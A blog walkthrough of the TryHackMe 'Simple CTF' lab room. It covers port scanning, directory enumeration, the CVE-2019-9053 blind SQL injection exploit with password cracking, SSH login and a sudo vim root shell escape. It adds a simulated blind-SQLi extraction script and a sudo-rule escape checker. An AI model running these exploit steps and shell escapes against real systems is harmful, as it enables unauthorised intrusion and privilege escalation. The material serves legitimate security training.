Jasper Alblas
Hi! It is time to have a thorough look at the Simple CTF room on TryHackMe. This room covers a lot of fundamental skills and techniques often used in pentesting assignments, and therefore I recommend it as a great CTF for a beginner.
Room URL: https://tryhackme.com/room/easyctf
I am making these walkthroughs to keep myself motivated to learn cyber security, and to make sure I remember the knowledge gained from THM's rooms. Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.
Deploy the machine and attempt the questions!
When we visit the IP address in a browser we get the following page:
It looks like a default Ubuntu installation with the stock Apache landing page. Hmm... Let's get to the questions!
To answer this question we can use Nmap to find out more:
nmap -sS -Pn -T4 -p- <TARGET IP>
With the following flags: -sS for a TCP SYN (half-open) scan, -Pn to skip host discovery and treat the host as up, -T4 for faster timing, and -p- to scan all 65535 TCP ports instead of only the default top 1000.
Answer: 2 (ports 21 and 80; 2222 is above 1000)
Now that we know about ports 21, 80 and 2222, we can get more information on them with the -A flag (OS detection, version detection, default NSE scripts and traceroute):
nmap -A -Pn -T4 -p21,80,2222 <TARGET_IP>
There are quite a few interesting findings here. We can see an FTP server that allows anonymous login, a robots.txt file with disallowed entries and, relevant to this question, SSH access on the non-standard port 2222.
Answer: ssh
We need to enumerate a bit more. Let's use gobuster to find files and directories on the web server:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u <TARGET IP>
A lot of interesting discoveries here. The one that stands out is the /simple page:
It shows a website running on CMS Made Simple. At the bottom of the page we can find a version number:
Let's see if we can find exploits for that version with searchsploit:
searchsploit cms made simple 2.2.8
More info can be found here:
This is the right exploit!
Answer: CVE-2019-9053
This is a SQL injection vulnerability, SQLi for short. CVE-2019-9053 is an unauthenticated, blind (time-based) SQL injection in the News module of CMS Made Simple before 2.2.10, and the Exploit-DB script below uses it to pull the admin user's username, e-mail, password hash and salt out of the database one character at a time.
Answer: SQLi
Let's download the script with wget, saving it as exploit.py so the later commands match:
wget https://www.exploit-db.com/download/46635 -O exploit.py
Then we can run this Python 2 script with:
python2 exploit.py -u <url>
Some notes:
After these changes we should be able to run the previous command. However, since we are interested in the password rather than just the hash, we need to add the -c flag (crack the hash) together with the -w flag (the wordlist to crack it with):
python2 exploit.py -u <url> -c -w /usr/share/wordlists/rockyou.txt
We find the following password:
Answer: secret
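To show what the exploit script is actually doing during the steps above, here is an added example (not the page's code and not the Exploit-DB script) that simulates the whole chain offline: a query that concatenates user input, a boolean oracle built on top of it, character-by-character extraction of the password hash and salt by binary search, and an offline dictionary attack on the result. The schema, table names, salt, password, wordlist and the md5(salt + password) hash scheme are all constructed assumptions for the simulation, and the oracle is boolean rather than time-based; the extraction logic is the same either way, only the oracle changes.

```python
import hashlib
import sqlite3

# Everything below is constructed for the example: table and column names, the salt,
# the password, the wordlist and the hash scheme are stand-ins, not data from the target.
SALT = "a1b2"
TRUE_PASSWORD = "secret"
STORED_HASH = hashlib.md5((SALT + TRUE_PASSWORD).encode()).hexdigest()
INJECTION_PREFIX = "1) AND ("  # closes the IN (...) list and opens our own condition


def build_vulnerable_db():
    """In-memory SQLite stand-in for the CMS database (invented schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms_news (news_id INTEGER, title TEXT)")
    conn.execute("INSERT INTO cms_news VALUES (1, 'Welcome')")
    conn.execute("CREATE TABLE cms_users (username TEXT, password TEXT, salt TEXT)")
    conn.execute("INSERT INTO cms_users VALUES ('mitch', ?, ?)", (STORED_HASH, SALT))
    return conn


def vulnerable_news_lookup(conn, idlist):
    """The bug: the id list from the request is concatenated straight into the query."""
    query = "SELECT news_id FROM cms_news WHERE news_id IN (" + idlist + ")"
    return conn.execute(query).fetchall()


def make_oracle(conn):
    """Boolean oracle: True when the injected condition lets the query return a row.
    A time-based oracle would instead measure whether the response was delayed."""
    def injected_condition_is_true(condition):
        return len(vulnerable_news_lookup(conn, INJECTION_PREFIX + condition)) > 0
    return injected_condition_is_true


def binary_search_int(oracle, expression, lo=0, hi=255):
    """Find the integer value of an SQL expression with one 'greater than mid?' query per step."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expression}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_column(oracle, column, where):
    """Recover a string column one character at a time, the way a blind SQLi script does.
    A missing row yields NULL, NULL > n is never true, so the length comes back as 0."""
    def subquery(expr):
        return f"SELECT {expr} FROM cms_users WHERE {where}"
    length = binary_search_int(oracle, subquery(f"length({column})"))
    chars = []
    for pos in range(1, length + 1):
        code = binary_search_int(oracle, subquery(f"unicode(substr({column},{pos},1))"), 0, 127)
        chars.append(chr(code))
    return "".join(chars)


def crack_salted_md5(stored_hash, salt, wordlist):
    """Offline dictionary attack on the recovered hash; md5(salt + password) is an
    assumption made for this example, so check the real scheme before reusing it."""
    for candidate in wordlist:
        if hashlib.md5((salt + candidate).encode()).hexdigest() == stored_hash:
            return candidate
    return None


def run_attack():
    """Full chain: extract hash and salt through the oracle, then crack offline."""
    conn = build_vulnerable_db()
    oracle = make_oracle(conn)
    where = "username='mitch'"
    pw_hash = extract_column(oracle, "password", where)
    salt = extract_column(oracle, "salt", where)
    wordlist = ["password", "123456", "letmein", "secret", "qwerty"]  # constructed stand-in for rockyou.txt
    return pw_hash, salt, crack_salted_md5(pw_hash, salt, wordlist)


if __name__ == "__main__":
    recovered_hash, recovered_salt, password = run_attack()
    print(f"hash={recovered_hash} salt={recovered_salt} password={password}")
```

Each character costs about seven oracle queries, which is why the real time-based version is slow and why the exploit's sleep threshold matters on a laggy VPN: a delayed response that arrives late is read as "true" and corrupts the extracted hash. The fix on the application side is the usual one, a parameterised query instead of string concatenation.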
Well, we have an SSH server, so let's try logging in with those credentials 🙂
We are logged in. Note: it is important to add the -p flag with port 2222, since SSH is not listening on the default port 22; otherwise the connection just hangs.
Answer: ssh
A simple ls, followed by cat user.txt, gives us the answer:
Answer: G00d j0b, keep up!
We are in mitch's home directory, so let's go one directory up (to /home) and list the folders there:
Answer: sunbath
Let's list the commands that the current user is allowed to run with sudo:
We are allowed to run vim as root through sudo, and a text editor that can spawn a shell is as good as a root shell.
Answer: vim
Let’s look at our friend GTFOBins:
https://gtfobins.github.io/gtfobins/vim
Here we can read how to abuse this sudo right to break out of restricted environments by spawning an interactive system shell.
We do this like this:
sudo vim -c ':!/bin/sh'
This gives us a root shell:
Answer: W3ll d0n3. You made it!
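The check done by hand above (list the sudo rules, then look each binary up on GTFOBins) is worth scripting, both for pentest triage and for auditing sudoers files before they ship. The following is an added example, not code from the page or from GTFOBins: it parses the rule block of `sudo -l` output and flags every rule that hands out a root shell. The sample output is constructed for the example, and the escape table is a hand-picked subset of the GTFOBins sudo entries, so a binary missing from it is not a clean bill of health.

```python
import re

# Constructed sample of `sudo -l` output for the example; not the target's real output.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/id, /usr/bin/less
    (ALL : ALL) ALL
"""

# Hand-picked subset of binaries for which GTFOBins documents a sudo shell escape.
# The real list is much longer; extend it before relying on a negative result.
SHELL_ESCAPES = {
    "vim": "sudo vim -c ':!/bin/sh'",
    "vi": "sudo vi -c ':!/bin/sh'",
    "less": "sudo less /etc/profile   (then type !/bin/sh)",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
}

# One sudoers rule line as printed by sudo -l: "(runas) [TAG:] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<commands>.+)$")


def parse_sudo_l(output):
    """Return (runas, nopasswd, command) tuples from the 'may run the following commands' block."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        nopasswd = "NOPASSWD:" in match.group("tags")
        for command in match.group("commands").split(","):
            rules.append((match.group("runas").strip(), nopasswd, command.strip()))
    return rules


def find_shell_escapes(rules):
    """Flag every rule that gives a root shell: ALL, or a binary with a known escape."""
    findings = []
    for runas, nopasswd, command in rules:
        if command == "ALL":
            findings.append((command, runas, nopasswd, "sudo /bin/sh"))
            continue
        binary = command.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPES:
            findings.append((command, runas, nopasswd, SHELL_ESCAPES[binary]))
    return findings


def report(output):
    """One human-readable line per finding, in the order the rules appear."""
    lines = []
    for command, runas, nopasswd, escape in find_shell_escapes(parse_sudo_l(output)):
        tag = "NOPASSWD" if nopasswd else "password required"
        lines.append(f"{command} as ({runas}) [{tag}] -> {escape}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_SUDO_L)))
```

On a real box, feed it `sudo -l` output (for example via `subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout`) rather than the constructed sample. From the defensive side, the same parser tells you which sudoers entries need to go: anything that lets a user run an editor, pager or interpreter as root is equivalent to giving them root.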
We are done!
There is a little easter egg on the FTP server. You can connect to it with ftp <ip> and log in with the username anonymous. There is a text file on the server, which you can download with get ForMitch.txt and then read.
It would have given us some extra info on both the username and the password 🙂
Anyway, thanks for reading! That’s Simple CTF over with!
You are welcome to comment on this article or share it with friends.
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: